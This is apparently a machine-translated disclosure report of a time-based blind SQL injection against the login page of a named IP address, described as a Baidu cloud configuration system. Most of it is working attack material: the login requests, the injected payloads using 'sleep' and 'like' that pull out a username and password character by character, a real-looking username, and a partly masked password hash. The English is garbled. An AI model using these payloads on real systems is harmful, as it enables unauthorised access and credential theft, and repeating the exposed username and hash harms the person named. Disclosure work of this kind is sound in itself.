http://103.235.46.165 main anti Baidu cloud configuration system
http://103.235.46.165/index.php/Manage/login
POST: Test = username & password = Test
{ "Status": 0, "info": "user password is incorrect", "data": false}
http://103.235.46.165/index.php/Manage/login
POST: username = Test ' & password = Test
{ "Status": 0, "info": "user name does not exist", "data": false}
Login Username Password point is whether it is right or wrong but user password is incorrect 'appears there is no username
post: username = test' or sleep (1) # & password = test delay of 10 seconds there are 8 users like
Login at the same table would be directly check information log on to
username=test' or username like '%' and sleep(1)#&password=test
Delay field username password Similarly there are also
first read the user name out
username=test' or username like 't%' and sleep(1)#&password=test
Note that in turn delayed the user tanguangxi
username=tanguangxi' and password like '3%' and sleep(5)#&password=test
Note that in turn password
31c724c7395d4367dfa6d4 **********
solved Login